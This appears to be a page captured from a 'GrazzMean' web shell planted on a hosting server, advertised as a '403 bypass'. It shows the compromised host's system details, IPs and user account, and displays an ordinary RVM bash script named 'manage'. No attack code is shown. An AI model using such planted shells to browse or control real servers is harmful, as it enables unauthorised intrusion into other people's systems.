shell bypass 403

GrazzMean Shell

Uname: Linux web3.us.cloudlogin.co 5.10.226-xeon-hst #2 SMP Fri Sep 13 12:28:44 UTC 2024 x86_64
Software: Apache
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.210.96.117
Your Ip: 3.143.239.189
User: edustar (269686) | Group: tty (888)
Safe Mode: OFF
Disable Function:
NONE

name : manage
#!/usr/bin/env bash

# __rvm_detect_system() does not support AIX
sys=$( command uname -s )
if [[ "${sys}" == AIX ]]
then name_opt=-name
else name_opt=-iname
fi
original_ruby_version=${rvm_ruby_version:-""}
original_ruby_string=${rvm_ruby_string:-""}

source "$rvm_scripts_path/patches"
source "$rvm_scripts_path/functions/build"
source "$rvm_scripts_path/functions/pkg"
source "$rvm_scripts_path/functions/irbrc"
source "$rvm_scripts_path/functions/support"
source "$rvm_scripts_path/functions/rubygems"
source "$rvm_scripts_path/functions/manage/base"

if [[ -n "${RUBYOPT:-""}" ]]
then ruby_options="$RUBYOPT"
fi
unset RUBYLIB RUBYOPT # Sanity check.

binaries=()

__rvm_manage_rubies  # located in scripts/functions/manage/base
© 2025 GrazzMean